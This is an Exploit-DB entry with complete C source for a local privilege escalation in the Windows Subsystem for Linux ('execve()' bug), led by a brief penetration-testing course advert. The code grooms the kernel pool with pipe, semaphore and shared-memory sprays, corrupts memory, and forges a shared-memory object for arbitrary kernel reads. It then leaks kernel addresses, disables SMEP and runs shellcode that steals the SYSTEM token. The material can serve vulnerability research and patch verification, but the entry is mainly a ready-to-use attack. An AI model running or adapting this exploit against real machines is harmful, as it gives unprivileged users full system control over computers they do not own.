Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation

EDB-ID:

43962


Author:

Saar Amar

Type:

local


Platform:

Windows

Date:

2018-02-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#define _GNU_SOURCE

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h> 
#include <sys/sem.h>
#include <sys/shm.h>

#define RING_SIZE				0x2000000
#define PIPE_SIZE				0xb8
#define PTR_SIZE				0x8
#define STR_HDR_SIZE			0x18

#define LEAK_OFFSET				0x68
#define SHELLCODE_OFFSET		0x200
#define CHUNK_LVXF_OFFSET		0x138f4296
#define CR4_VAL_ADDR			0x506f8
#define MAGIC_KEY				0xefef
#define NT_OFFSET_TO_PIVOT		0x288005

size_t curr_key 				= 0;

char SHELLCODE[] = {
	//0xcc,
	0x90, 															// CLI
	0x90, 															// PUSHFQ
	0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RAX, Original Pointer
	0x50, 															// PUSH RAX
	0x51, 															// PUSH RCX
	0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90,  	// MOV RCX, [OverwriteAddr+OverwriteOffset]
	0x90, 0x90, 0x90,  												// MOV    QWORD PTR [RCX], RAX
	0xb9, 0xfc, 0x11, 0x00, 0x00,  									// MOV ECX, PID

	0x53, 															// PUSH RBX

	0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,  			// MOV    RAX,QWORD PTR gs:0x188
	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,						// MOV    RAX,QWORD PTR [RAX+0xb8] EPROCESS
	0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00,						// LEA    RAX,[RAX+0xActiveProcessLinkOffset] 

	//<tag>
	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
	0x48, 0x83, 0xfb, 0x04,											// CMP    RBX,0x4
	0x75, 0xf3,														// JNE    <tag>
	0x48, 0x8b, 0x58, 0x70,											// MOV    RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM
	0x90, 0x90, 0x90,
	0x53, 															// PUSH RBX
	//<tag2>
	0x48, 0x8b, 0x00,												// MOV    RAX,QWORD PTR [RAX]
	0x48, 0x8b, 0x58, 0xf8,											// MOV    RBX,QWORD PTR [RAX-8] // UniqueProcessID
	0x39, 0xcb,														// CMP    EBX, ECX // our PID
	0x75, 0xf5,														// JNE    <tag2>
	0x5b, 															// POP RBX
	0x48, 0x89, 0x58, 0x70,											// MOV    QWORD PTR[RAX +0x70], RBX
	0x90, 0x90, 0x90,

	0x5b, 															// POP RBX
	0x59, 															// POP RCX
	0x58, 															// POP RAX
	0x90, 															// POPFQ

	0xc3  															// RET
};

int calc_stop_idx(size_t alloc_size, size_t factor);
int get_size_factor(size_t spray_size, size_t *factor);
int trigger_corruption(int spray_size);
int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx);
int spray(size_t count);
int alloc_sem(size_t factor);
int free_sem(int key);
char *get_faked_shm();
void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid);
void trigger_shm(size_t shmid);
void print_shm(struct shmid_ds *buf);
void *absolute_read(void* obj, size_t shmid, void *addr);
int alloc_shm(size_t key);
int shape(size_t *spray_size);

int calc_stop_idx(size_t alloc_size, size_t factor) {
	size_t totalStringsLength, headersLength;

	totalStringsLength = (factor - 1) * 2 + 0xd001;
	headersLength = (factor * STR_HDR_SIZE) % (0x100000000);

	return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE;
}

int get_size_factor(size_t spray_size, size_t *factor) {
	if (spray_size != 0x2000000) {
		printf("SPRAY_SIZE ISSUE\n");
		exit(1);
	}

	*factor = 0xab13aff - 0x800*2;
	return 0x15fffdfc;
}

int trigger_corruption(int spray_size) {
	size_t factor = 0, alloc_size, stopIdx;
	int ret;
	alloc_size = get_size_factor(spray_size, &factor);
	if (alloc_size < 0) {
		printf("[*err*] unsupported spray_size == 0x%x", spray_size);
		return -1;
	}

	stopIdx = calc_stop_idx(alloc_size, factor);

	ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
	printf("[*] trigger_corruption() returned 0x%x\n", ret);
	return 0;
}

int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx) {
	char **argv, *innerBuf, *stopInnerBuf = NULL;
	size_t pid;

	argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, 
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if(!argv) {
		perror("[*err*] malloc argv failed\n"); 
		return -1;
	}

	innerBuf = (char*)malloc(innerSize); 
	if (!innerBuf) {
		printf("[*err*] malloc innerBuf failed\n");
		return -1;
	}
	memset(innerBuf, pattern, innerSize);

	for(size_t i = 0; i < argc - 1; ++i) {
		argv[i] = innerBuf;
	}
	argv[argc-1] = NULL;

	pid = fork();
	if (pid) {
		// parent
		if(stopIdx > 0) {
			sleep(1.5);
			printf("[*] set stopIdx, stopping wildcopy\n");
			argv[stopIdx] = NULL;
		}
		return 0;
	} else {
		// son
		argv[stopIdx - 1] = (char*)malloc(0xe000);
		memset(argv[stopIdx - 1], "X", 0xd000-1);
		argv[stopIdx - 1][0xd000-1] = '\0';

		argv[stopIdx - 7] = (char*)malloc(0xe000);
		memset(argv[stopIdx - 7], "X", 0xd000-1);
		argv[stopIdx - 7][0xd000-1] = '\0';

		// this execve is on nonsense "program", so it will return err.
		// Just kill the thread.
		execve(argv[0], argv, NULL);
		exit(1);
	}
}

/*
	spray <count> chunks, and return number of total bytes allocated
*/
int spray(size_t count) {
	int exec[2];
	int pipe_capacity = 0, ret = 0;

	for (size_t i = 0; i < count; ++i) {
		if (pipe(exec) < 0) {
			printf("[*err*] pipe\n");
			ret = -1;
			goto cleanup;
		}		

		pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE);
		if(pipe_capacity < 0) {
			printf("[*err*] fcntl return neg capacity\n");
			ret = -1;
			goto cleanup;
		}

		ret += pipe_capacity;
	}

cleanup:
	return ret;
}

/*
	allocate 12 * v_nsems + 176
*/
int alloc_sem(size_t factor) {
	int semid;
  	int nsems = factor;

  	semid = semget(curr_key++, nsems, IPC_CREAT | 0666);
  	if(semid == -1) {
  		printf("[*err*]semget failed, errno == 0x%x\n", errno);
  		return -1;
  	}

	return semid;
}

int free_sem(int key) {
	if(semctl(key, 0, IPC_RMID, 0) == -1) {
		printf("[*err*] semctl failed, errno == 0x%x\n", errno);
		return -1;
    }
    return 0;
}

char *get_faked_shm() {
	size_t shellcode_length = 0;
	char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
	char *shellcode_ptr;

	if (obj == (void*)-1) {
		printf("[*err*] mmap failed\n");
		return NULL;
	}
	char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC,
					MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
	if (cr4_addr == (void*)-1) {
		printf("[*err*] mmap failed\n");
		return NULL;
	}
	memset(cr4_addr, 0x0, 0x10000);

	printf("[*] mmap userspace addr %p, set faked shm object\n", obj);

	obj += 0x1000;
	shellcode_ptr = obj + 0x200;
	initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1);
	return obj;
}

void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid) {
	size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR;
	char *obj2 = obj+0x1000;

	memset(obj - 0x100, 0x0, 0x1000);

	memcpy(obj, &read_addr, sizeof(size_t));
	memcpy((obj+0x10), &val, sizeof(size_t));

	memcpy(obj - 0x20, &val2, sizeof(size_t));
	memcpy(obj - 0x68, &obj, sizeof(char*));
	memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*));
	memcpy(obj - 0x80, &obj, sizeof(char*));
	memcpy((obj + 0x40), &val, sizeof(size_t));

	memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t));
	memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t));
	memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*));
	memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*));
	memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*));
	memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t));

	memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t));						// refcount
	memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t));
	memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t));

	memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE));
	memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4);
}

void trigger_shm(size_t shmid) {
	char *data;
	data = shmat(shmid, (void*)0, 0);
}

void print_shm(struct shmid_ds *buf) {
	printf ("\nThe USER ID = %p\n", buf->shm_perm.uid);
	printf ("The GROUP ID = %p\n", buf->shm_perm.gid);
	printf ("The creator's ID = %p\n", buf->shm_perm.cuid);
	printf ("The creator's group ID = %p\n", buf->shm_perm.cgid);
	printf ("The operation permissions = 0%o\n", buf->shm_perm.mode);
	printf ("The slot usage sequence\n");
	//printf ("number = 0%x\n", buf->shm_perm.seq);
	//printf ("The key= 0%x\n", buf->shm_perm.key);
	printf ("The segment size = %p\n", buf->shm_segsz);
	printf ("The pid of last shmop = %p\n", buf->shm_lpid);
	printf ("The pid of creator = %p\n", buf->shm_cpid);
	printf ("The current # attached = %p\n", buf->shm_nattch);
	printf("The last shmat time = %p\n", buf->shm_atime);
	printf("The last shmdt time = %p\n", buf->shm_dtime);
	printf("The last change time = %p\n", buf->shm_ctime);
}

void *absolute_read(void* obj, size_t shmid, void *addr) {
	struct shmid_ds shm;
	initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1);
	shmctl(shmid, IPC_STAT, &shm);
	return (void*)shm.shm_ctime;
}

int alloc_shm(size_t key) {
	int shmid;
	shmid = shmget(key, 1024, 0644 | IPC_CREAT);
	return shmid;
}

int shape(size_t *spray_size) {
	size_t keys[0x400];
	int exec[2];
	int sv[2];
    char flag;

	size_t bytes = 0, tofree = 0;
	size_t factor,hole_size;
	struct flock fl;
	memset(&fl, 0, sizeof(fl));
	pid_t pid, wpid;
	int status;

	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
		printf("[*err] socketpair failed\n");
		return 1;
	}

	bytes = spray(1);
	if (bytes == (size_t)-1) {
		printf("[*err*] bytes < 0, are you root?\n");
		return 1;
	}

	*spray_size = bytes;
	hole_size = get_size_factor(*spray_size, &factor);

	tofree = hole_size / (bytes / 1) + 1;

	printf("[*] allocate holes before the workspace\n");
	for (int i = 0; i < 0x400; ++i) {
		keys[i] = alloc_sem(0x7000);
	}
	for (int i = 0; i < 0x20; ++i) {
		alloc_sem(0x7000);
	}
	for (int i = 0; i < 0x2000; ++i) {
		alloc_sem(4063);
	}
	for (int i = 0; i < 0x2000; ++i) {
		alloc_sem(3);
	}

	pid = fork();
	if (pid > 0) {
		printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
		bytes = spray(5);
		write(sv[1], "p", 1);
		read(sv[1], &flag, 1);
	} else {
		// son
		read(sv[0], &flag, 1);
		printf("[*] alloc workspace pages\n");
		bytes = spray(tofree);
		printf("[*] finish allocate workspace allocations\n");
		write(sv[0], "p", 1);
	}

	if (pid > 0) {
		printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
		for (int i = 0; i < 0x100; ++i) {
			alloc_sem(4061);
			for (int j = 0; j < 0x5; ++j) {	
				alloc_shm(i * 0x100 + j);
			}
		}
		write(sv[1], "p", 1);
	} else {
		read(sv[0], &flag, 1);
		printf("[*] free middle allocation, creating workspace freed\n");
		exit(1);
	}

	while ((wpid = wait(&status)) > 0); 

	printf("[*] free prepared holes, create little pages holes before the workspace\n");
	for (int i = 0; i < 0x400; ++i) {
		free_sem(keys[i]);
	}
	
	return 0;
}

int main(int argc, char **argv) {
	size_t spray_size = 0;
	char *obj;
	void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler;
	void *nt_addr;

	obj = get_faked_shm();

	printf("[*] start shaping\n");
	if (shape(&spray_size)) {
		printf("[*err*] shape failed, exit\n");
		return 1;
	}

	// if there is some shm with shmid==0, delete it
	shmctl(0, IPC_RMID, NULL);

	printf("[*] shape is done\n");
	if (trigger_corruption(spray_size) < 0) {
		printf("[*err*] internal error\n");
		return 1;
	}

	sleep(8);

	printf("[*] leak shm, with the corrupted shmid\n");
	paged_pool_addr = absolute_read(obj, 1, NULL);

	printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr);
	file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET);
	printf("[*] infoleak - fileObj addr at %p\n", file_obj);
	lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET);
	printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr);
	nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET);
	printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler);

	printf("[*] call nt pivot, disable SMEP\n");
	initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1);
	trigger_shm(MAGIC_KEY);

	sleep(5);

	printf("[*] jump to shellcode!\n");
	initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1]));
	trigger_shm(MAGIC_KEY);

	sleep(2);

	return 0;
}